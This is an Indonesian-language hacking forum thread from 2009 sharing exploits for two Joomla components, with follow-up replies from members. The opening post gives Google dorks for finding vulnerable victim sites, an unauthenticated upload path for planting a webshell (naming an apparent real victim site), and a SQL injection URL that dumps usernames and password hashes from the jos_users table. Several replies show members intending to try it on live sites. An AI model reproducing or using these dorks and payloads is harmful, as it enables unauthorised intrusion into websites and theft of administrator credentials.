Joomla Component Vuln

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Joomla Component Vuln

Post by N4ck0 » Mon Jun 08, 2009 8:38 pm

Courtesy Milw0rm.com

Just Share vuln On joomla CMS

I

1. Find viktim om google,

dgn dork
inurl:option=com_agora


2.setelah dapet viktimnya, loe masukan exploitnya :


index.php?option=com_agora&task=upload

misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload

3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini


components/com_agora/img/members/0/

misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]

II

type in google with dork :

inurl:option=com_jvideo or
inurl:com_jvideo

masukin exploitnya

index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

semoga bermanfaat

anja_indie
Posts: 20
Joined: Thu Jun 19, 2008 1:51 pm

Re: Joomla Component Vuln

Post by anja_indie » Tue Jun 09, 2009 12:06 am

to semua wweb yg pk joomla kan???
jajal ah.........

User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:

Re: Joomla Component Vuln

Post by vodork » Wed Jun 10, 2009 4:01 am

emm...
besok coba ah... :D :D
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.

User avatar
taurnil
Posts: 34
Joined: Wed Jun 10, 2009 5:20 am

Re: Joomla Component Vuln

Post by taurnil » Wed Jun 10, 2009 5:29 am

cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW
in learning you will teach, and in teaching you will learn......

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: Joomla Component Vuln

Post by N4ck0 » Wed Jun 10, 2009 7:02 pm

anja_indie wrote:to semua wweb yg pk joomla kan???
jajal ah.........
iya itu buat web berbasis joomla
vodork wrote:emm...
besok coba ah... :D :D
silahkan kk
taurnil wrote:cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW

iya mang tuh componentnya joomla kk

User avatar
andi90
Posts: 19
Joined: Fri Sep 12, 2008 1:57 pm
Location: depok
Contact:

Re: Joomla Component Vuln

Post by andi90 » Wed Jun 10, 2009 7:44 pm

kk itu buat apa sih?
maklumlah saia cupu
--------be careful boy's!------
Image
Image

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: Joomla Component Vuln

Post by N4ck0 » Thu Jun 11, 2009 9:53 am

andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya

User avatar
andi90
Posts: 19
Joined: Fri Sep 12, 2008 1:57 pm
Location: depok
Contact:

Re: Joomla Component Vuln

Post by andi90 » Thu Jun 11, 2009 1:10 pm

N4ck0 wrote:
andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya
termasuk masuk ke joomla administration itu webnya yah?
--------be careful boy's!------
Image
Image

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: Joomla Component Vuln

Post by N4ck0 » Thu Jun 11, 2009 8:35 pm

andi90 wrote:
N4ck0 wrote:
andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya
termasuk masuk ke joomla administration itu webnya yah?

iya kk
mang itu buat jadi adminnya
ada juga yang langsung upload shell kita

User avatar
ji_bog
Posts: 19
Joined: Sat May 27, 2006 12:22 am
Location: lagi pengen sendiri..
Contact:

Re: Joomla Component Vuln

Post by ji_bog » Fri Jun 12, 2009 2:23 am

:P wew keren neh
thanks for share bro ;)
signatur saya begini aja deh :D

Post Reply

Return to “Web Hacking”